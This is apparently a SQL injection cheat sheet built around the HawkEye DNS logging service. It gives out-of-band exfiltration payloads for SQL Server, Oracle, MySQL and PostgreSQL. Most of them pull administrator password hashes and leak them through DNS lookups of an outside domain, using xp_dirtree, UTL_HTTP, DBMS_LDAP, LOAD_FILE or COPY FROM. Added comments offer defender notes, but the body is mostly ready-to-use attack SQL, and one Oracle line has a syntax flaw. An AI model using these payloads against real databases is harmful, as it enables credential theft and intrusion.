HawkEye Log/Dns 在Sql注入中的应用
Hawkeye: http://hawkeye.hackinglab.cn/
支持的数据库类型
- SQL Server
- Mysql
- Oracle
- PostgreSQL
注入姿势
SQL Server
Example:
-- T-SQL: the first sys.sql_logins row named 'sa' has its password_hash rendered as a hex
-- string, a fixed domain suffix is appended, and the result is handed to xp_dirtree as the
-- host part of a UNC path, so the database host has to look that name up before listing it.
-- Defender notes: reading password_hash from sys.sql_logins needs server-level permission,
-- so an application login able to run this is badly over-privileged; review which principals
-- may execute xp_dirtree, and treat name lookups for unfamiliar domains originating from the
-- database host as the detection signal.
DECLARE @host varchar(1024);
SELECT @host=(SELECT TOP 1
master.dbo.fn_varbintohexstr(password_hash)
FROM sys.sql_logins WHERE name='sa')
+'.s.livesina.com';
-- Dynamic SQL; the UNC path becomes \\<hash>.s.livesina.com\foobar$ at runtime.
EXEC('master..xp_dirtree
"\\'+@host+'\foobar$"');
Oracle
Example1:
-- UTL_INADDR.GET_HOST_ADDRESS resolves a host name; the name itself carries the only data.
-- Defender note: in current Oracle releases UTL_INADDR is gated by network ACLs, so grant it
-- only to accounts that genuinely need name resolution, and alert on lookups of unexpected
-- domains coming from the database host.
SELECT UTL_INADDR.GET_HOST_ADDRESS('test.y.s.livesina.com');
Example2:
-- UTL_HTTP.REQUEST fetches a URL, which implies resolving the host name and then an outbound
-- HTTP connection from the database server.
-- Defender note: UTL_HTTP is ACL-gated; egress from the database tier to arbitrary hosts
-- should be blocked at the network layer regardless of package grants.
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example3:
-- Identical to the statement shown under Example2 as written: UTL_HTTP.REQUEST resolves the
-- host name and issues an outbound HTTP request from the database server.
SELECT UTL_HTTP.REQUEST('http://test.y.livesina.com/test') FROM DUAL;
Example4:
-- HTTPURITYPE(...).GETCLOB() retrieves the URL body as a CLOB — same outbound name lookup
-- and HTTP egress as UTL_HTTP, via a different package.
-- Defender note: HTTPURITYPE is covered by the same network ACLs as UTL_HTTP; audit grants on
-- both, not just one.
SELECT HTTPURITYPE('http://test.y.livesina.com/test').GETCLOB() FROM DUAL;
Example5:
-- Intended to open an LDAP session with DBMS_LDAP.INIT against the named host on port 80;
-- the session setup forces the host name to be resolved first.
-- Defender note: DBMS_LDAP is also ACL-gated in current releases; it rarely needs to be
-- executable by application schemas.
SELECT DBMS_LDAP.INIT(('test.s.livesina.com',80) FROM DUAL;
Example6:
-- Same DBMS_LDAP.INIT call as Example5, but the host name is built from the password column of
-- SYS.USER$ for the SYS row, concatenated with a fixed domain suffix.
-- Defender notes: SYS.USER$ is readable only with SYS-level privileges, so an injected session
-- that can run this is already fully privileged; outbound connection attempts from the
-- database host to names under an unfamiliar domain are the detection signal.
SELECT DBMS_LDAP.INIT((SELECT password FROM SYS.USER$ WHERE name='SYS')||'.s.livesina.com',80) FROM DUAL;
Mysql
Example:
-- LOAD_FILE is pointed at a UNC path whose host part is the mysql.user password column for
-- 'root' plus a fixed domain suffix; on a Windows server the name is resolved before the read.
-- Defender notes: LOAD_FILE requires the FILE privilege and is constrained by secure_file_priv;
-- an application account should hold neither FILE nor SELECT on mysql.user, and the database
-- host should have no DNS/SMB egress to arbitrary domains.
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.s.livesina.com\\abc'));
PostgreSQL
Example:
-- Scratch table that the later COPY ... FROM writes into; the DROP/CREATE pair makes the
-- script re-runnable. Its contents are incidental — the side effect of the path lookup is
-- what the example relies on.
DROP TABLE IF EXISTS table_output;
CREATE TABLE table_output(content text);
-- PL/pgSQL helper: reads the passwd value for 'postgres' from pg_shadow, splices it into the
-- host part of a UNC-style COPY ... FROM path with a fixed domain suffix, and runs that
-- statement with EXECUTE. Returns nothing; the file open attempt is the point.
-- Defender notes: pg_shadow is superuser-only and server-side COPY FROM a file needs superuser
-- or pg_read_server_files, so the injected session is already at the top privilege level.
-- SECURITY DEFINER keeps the creator's rights for any later caller — a leftover function like
-- this is itself a persistence risk and should be dropped when found.
-- NOTE(review): two layers of E'' escaping are in play (the outer literal and the inner one it
-- emits), so the runtime path has fewer backslashes than the source suggests; Windows UNC
-- resolution is presumably assumed — on other platforms the open simply fails.
CREATE OR REPLACE FUNCTION temp_function()
RETURNS VOID AS $$
DECLARE exec_cmd TEXT;
DECLARE query_result TEXT;
BEGIN
SELECT INTO query_result (SELECT passwd
FROM pg_shadow WHERE usename='postgres');
exec_cmd := E'COPY table_output(content)
FROM E\'\\\\\\\\'||query_result||E'.s.livesina.com\\\\foobar.txt\'';
EXECUTE exec_cmd;
END;
$$ LANGUAGE plpgsql SECURITY DEFINER;
-- Invokes the helper once; nothing useful is returned. Auditors can find leftovers of this
-- pattern by listing SECURITY DEFINER functions owned by superusers in non-system schemas.
SELECT temp_function();